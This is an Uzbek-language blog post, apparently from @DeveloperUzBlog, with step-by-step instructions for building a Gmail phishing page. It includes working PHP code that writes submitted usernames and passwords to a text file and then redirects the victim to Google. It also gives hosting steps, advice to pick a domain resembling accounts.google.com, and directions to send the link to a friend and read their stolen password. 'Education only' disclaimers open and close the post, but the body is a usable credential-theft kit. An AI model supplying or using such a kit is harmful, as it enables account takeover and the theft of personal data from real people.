PHISHING
Phishing hack - bu orqali xakker sizning parol, kredit karta raqamlaringizni va hokazo kabi ma'lumotlaringizni oson yo'l bilan olishlari hisoblanadi.
Masalan xakker sizning gmailingizni va kodini olmoqchi bo'lsa huddi gmail sahifasiga o'xshash sahifa yaratadi va siz uning saytiga kirasiz shunda sizdan gmail username va kodni so'raydi siz yozasiz va xakker sizning shahsiy ma'lumotlaringizni o'zlashtirishi mumkin.
OGOHLANTIRISHUshbu qo'llanma faqat ta'lim uchun. Phishing noqonuniy hisoblanadi va jinoyat hisoblanadi. Bu postni tayyorlashdan asosiy sabab, xakkerlar elektron pochtani qanday qilib olayotganlarini yoki sizning ma'lumotingizni qanday osonlik bilan o'g'irlashlarini ko'rsatishdir. Phishingni sinab ko'rishni hech kimga tavsiya etmaymiz. Agar kimdir buni sinab ko'rsa va muammoga duch kelsa, sayt adminlari javob bermaydi.
GMAIL PHISHING HACK
Siz fishing fayllarini yaratish uchun quyidagi qadamlarni bajarishingiz kerak:
Gmail veb-saytiga o'ting va u yerda sichqonchaning o'ng tugmasini bosing va "Как сохранить...(yoki Save as...) tugmalarini bosib index.html deb saqlang.
Index.html ga kiramiz va mana shu yozuvni topib olamiz "https://accounts.google.com/ServiceLoginAuth" va shu yozuvni "post.php"(qo'shtirnoqsiz) ga o'zgartiramiz va index.html qilib saqlaymiz.
Sizning phishing sahifangiz tayyor. Endi siz phishing fayli yaratishingiz kerak, bu sizning phishing sahifangizni asl gmail veb-saytiga yo'naltiradi va gmail bilan kodni saqlab qo'yadi. Bloknot ochamiz va quyidagi kodlarni kiritamiz:
<?php header ('Location:https://accounts.google.com/');
$handle = fopen("usernames.txt", "a"); foreach($_POST as $variable => $value) {
fwrite($handle, $variable); fwrite($handle, "=");
fwrite($handle, $value); fwrite($handle, "rn"); }
fwrite($handle, "rn");
fclose($handle); exit; ?>
Va "post.php" deb saqlab qo'yamiz
Sizda ikkita fayl mavjud, biri index.html, ikkinchisi post.php.
Endi siz ushbu fayllarni veb-saytga yuklashingiz kerak men www.000webhost.com dan foydalanishni afzal ko'raman www.000webhost.com saytiga kiramiz va tekinga sayt ochib olamiz .Domen nomini tanlashda ehtiyot bo'ling , u asl gmail domeniga mos kelishi kerak ya'ni www.accounts.google.com ga o'xshash bo'lishi kerak.
Endi panne l ni boshqaring va fayl menejerni bosing. Shundan so'ng yangi tab ochiladi. Endi public_html-ga o'ting.
Default.php nomli faylni o'chirib tashlang, o'chirib tashlangandan so'ng, ikki faylni index.html va post.php fayllarini birma-bir o'z saytingizga yuklang.Va TAYYOR!
Ushbu sahifaning urlini (ya'ni, domeningizning nomini) nusxalab ushbu havolani do'stingizga yuboring, va do'stingiz saytingizga kiradi va kod bilan gmailini yozadi. Endi siz uning parolini ko'rish uchun 000webhost hisobingizga kiring va fayl menejeriga o'ting, keyin public_html ga kiring, bu yerda kodlar usernames.txt nomli yangi fayl ichida bo'ladi. Endi ko'rishni bosing va u yerda sizning do'stingizning paroli va elektron pochta manzili bo'ladi.
Yoki fayllarni telegram kanalimiz orqali yuklab olishingiz mumkin:
ESLATMA
phishing - bu noqonuniy faoliyat, shuning uchun hech kimga sinab ko'rishni tavsiya etmaymiz. Ushbu post ta'lim maqsadida.
From: @DeveloperUzBlog